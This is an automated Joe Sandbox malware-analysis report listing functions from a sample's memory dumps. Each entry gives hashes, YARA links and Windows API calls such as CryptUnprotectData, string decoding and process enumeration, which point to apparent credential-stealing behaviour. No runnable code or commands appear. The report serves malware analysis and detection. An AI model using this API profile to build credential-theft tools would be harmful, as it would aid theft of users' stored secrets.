                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :T@H$Fu{$pH* $sW}{$mt%
                                  • API String ID: 0-703542919
                                  • Opcode ID: c4b4a821f164b6803f87b31d981829ce7585af3b5a8dcc00875d666b4593a010
                                  • Instruction ID: 16ca3a1692506354eecb2a7b22c5e7ffa8b29af158300dea3e6a4ca0b5215dc9
                                  • Opcode Fuzzy Hash: c4b4a821f164b6803f87b31d981829ce7585af3b5a8dcc00875d666b4593a010
                                  • Instruction Fuzzy Hash: 48A203B3A0C2149FD3046E2DEC8567ABBE5EFD4720F1A493DEAC487744EA3598058793
                                  Function 0084F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: \u$\u${${$}$}
                                  • API String ID: 0-582841131
                                  • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction ID: b476341b8d082a770d1e256f40c0b119247639ca5cbc22cac9a776608ddac622
                                  • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction Fuzzy Hash: E2418D12E19BD9C5CB058B7844A02AEBFB27FE6210F6D42AEC49D5F383C774414AD3A5
                                  Function 007EC920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 007EC971
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 007EC97C
                                  • lstrcat.KERNEL32(?,00800B47), ref: 007ECA43
                                  • lstrcat.KERNEL32(?,00800B4B), ref: 007ECA57
                                  • lstrcat.KERNEL32(?,00800B4E), ref: 007ECA78
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 2d22c72bddfc4914a125af9bc6ae6f0b97686d575230bbbfa6f6274907f9c7d9
                                  • Instruction ID: 61547cbcd1237e1ad6f8973b3eedf310dfcc4f6256d8232e93ddb8f9040a01eb
                                  • Opcode Fuzzy Hash: 2d22c72bddfc4914a125af9bc6ae6f0b97686d575230bbbfa6f6274907f9c7d9
                                  • Instruction Fuzzy Hash: 9F4173B590421EDBDB10DF94DC89BFEB778BB48304F0042A8E509A6281D7745A85CF91
                                  Function 007E72A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 007E72AD
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007E72B4
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007E72E1
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 007E7304
                                  • LocalFree.KERNEL32(?), ref: 007E730E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 94b351d4994c53bf90b2f9a2649af8853b350ea4e8629a3dc422083b5f4cb565
                                  • Instruction ID: beef04290c36ec3c9de20a6d1b543176faf1492fd7e71c2b7913248bae17fe14
                                  • Opcode Fuzzy Hash: 94b351d4994c53bf90b2f9a2649af8853b350ea4e8629a3dc422083b5f4cb565
                                  • Instruction Fuzzy Hash: C1011E75A44308BBDB14DFE8DC46FAE7778EB48B00F104644FB05BB2D1D6B0AA019B65
                                  Function 007F9790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007F97AE
                                  • Process32First.KERNEL32(00800ACE,00000128), ref: 007F97C2
                                  • Process32Next.KERNEL32(00800ACE,00000128), ref: 007F97D7
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 007F97EC
                                  • CloseHandle.KERNEL32(00800ACE), ref: 007F980A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: 5ab36a1396fcdf13807c19e8c9b081fbd70c0feb9b19982e45b1c069fef0739f
                                  • Instruction ID: 92ea1ffd1b016ff3196db8e462d3e255fb1556fc75e5476e6f71c868d152f8bb
                                  • Opcode Fuzzy Hash: 5ab36a1396fcdf13807c19e8c9b081fbd70c0feb9b19982e45b1c069fef0739f
                                  • Instruction Fuzzy Hash: E1010C75A14208EBDB20DFA4DD44BEDB7F8BB48700F104688E60997260DB749A40CF60
                                  Function 00804573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <7\h$huzx
                                  • API String ID: 0-2989614873
                                  • Opcode ID: 302405f28a2c7e4f2f56963709478e3905fd8b0be096c3929ab9b1d6b915724c
                                  • Instruction ID: 69d30060aa077b32fb2b6c2aa5912bb92a5d00a68f8630e73ee1d7e38873c204
                                  • Opcode Fuzzy Hash: 302405f28a2c7e4f2f56963709478e3905fd8b0be096c3929ab9b1d6b915724c
                                  • Instruction Fuzzy Hash: 8463637245EBD91EC727CB304BB61927F66FA1321031949CEC9C1CB4F3C6909A26E766
                                  Function 00C38C22 Relevance: 6.6, Strings: 4, Instructions: 1629COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: nJ3$pc_}$x~{${M<_
                                  • API String ID: 0-1034907141
                                  • Opcode ID: 8022c1d04545622f149a08f970c3d0cf7fc40591cb66eb1bdf2a73a2b58da35f
                                  • Instruction ID: a03d4a0373c0b6c289000c1fd76805c7cc9a1deefc2110d06bc418a1b62d515d
                                  • Opcode Fuzzy Hash: 8022c1d04545622f149a08f970c3d0cf7fc40591cb66eb1bdf2a73a2b58da35f
                                  • Instruction Fuzzy Hash: 2FB229F3A0C2009FE3046E2DDC8567ABBE9EF94720F1A493DEAC5C3744EA7558058697
                                  Function 007F9030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,007E51D4,40000001,00000000,00000000,?,007E51D4), ref: 007F9050
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: dc0f4fe2e312c2e5e6c6b48df21571028dcb9e32bb58f1b9f91fea79a6c8b376
                                  • Instruction ID: 6848035aa073468a9a43e08b72b119506f4fe47722d58b2d013934324dc5361c
                                  • Opcode Fuzzy Hash: dc0f4fe2e312c2e5e6c6b48df21571028dcb9e32bb58f1b9f91fea79a6c8b376
                                  • Instruction Fuzzy Hash: 5811C874204209FFDF04DF98D885FBA33A9AF89310F108558FB198B351DB79E9419B61
                                  Function 007F7B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00800DE8,00000000,?), ref: 007F7B40
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F7B47
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00800DE8,00000000,?), ref: 007F7B54
                                  • wsprintfA.USER32 ref: 007F7B83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 4e88dee113fb492f4e42ab188a5f0b2d34d1dfdd932aa27960747fa684e26968
                                  • Instruction ID: b98dd0e2d6d3fe68b85c0fe208b2f0e11d1ccdf196874152ce3cbdba77906840
                                  • Opcode Fuzzy Hash: 4e88dee113fb492f4e42ab188a5f0b2d34d1dfdd932aa27960747fa684e26968
                                  • Instruction Fuzzy Hash: 0A1115B2908218AACB14DBD9DD45BBEB7B8EB8CB11F10421AF605A2290E6795940C7B0
                                  Function 007F7BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0145D890,00000000,?,00800DF8,00000000,?,00000000,00000000), ref: 007F7BF3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F7BFA
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0145D890,00000000,?,00800DF8,00000000,?,00000000,00000000,?), ref: 007F7C0D
                                  • wsprintfA.USER32 ref: 007F7C47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: e48e2d00a236f4d77c66a33ddfad56f324da0e41ee10ff89ce0062ed18bfe1f9
                                  • Instruction ID: ac5ce11748aedd0bbd5b550b7f278eb6895d3d8d0513d7a5ca2866817a6bfede
                                  • Opcode Fuzzy Hash: e48e2d00a236f4d77c66a33ddfad56f324da0e41ee10ff89ce0062ed18bfe1f9
                                  • Instruction Fuzzy Hash: 2C118EB1A09218EBEB24DB54DC45FA9B778FB44721F100395F61AA73D0D7785A40CF50
                                  Function 007F3970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(007FE120,00000000,00000001,007FE110,00000000), ref: 007F39A8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 007F3A00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 9c85c4e11b598650d3489ae37ae6a15ad1b66d626e11e17461a5a9378c02c5c0
                                  • Instruction ID: 403d60acf32c8d53fe734b8edf8950218ebaa83ddec2ef5adbac8f54f14e1111
                                  • Opcode Fuzzy Hash: 9c85c4e11b598650d3489ae37ae6a15ad1b66d626e11e17461a5a9378c02c5c0
                                  • Instruction Fuzzy Hash: 8441EB70A00A1C9FDB14DB54CC55B9BB7B5AB48702F4082C8E618E72A0D7B16EC5CF50
                                  Function 007EA2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007EA2D4
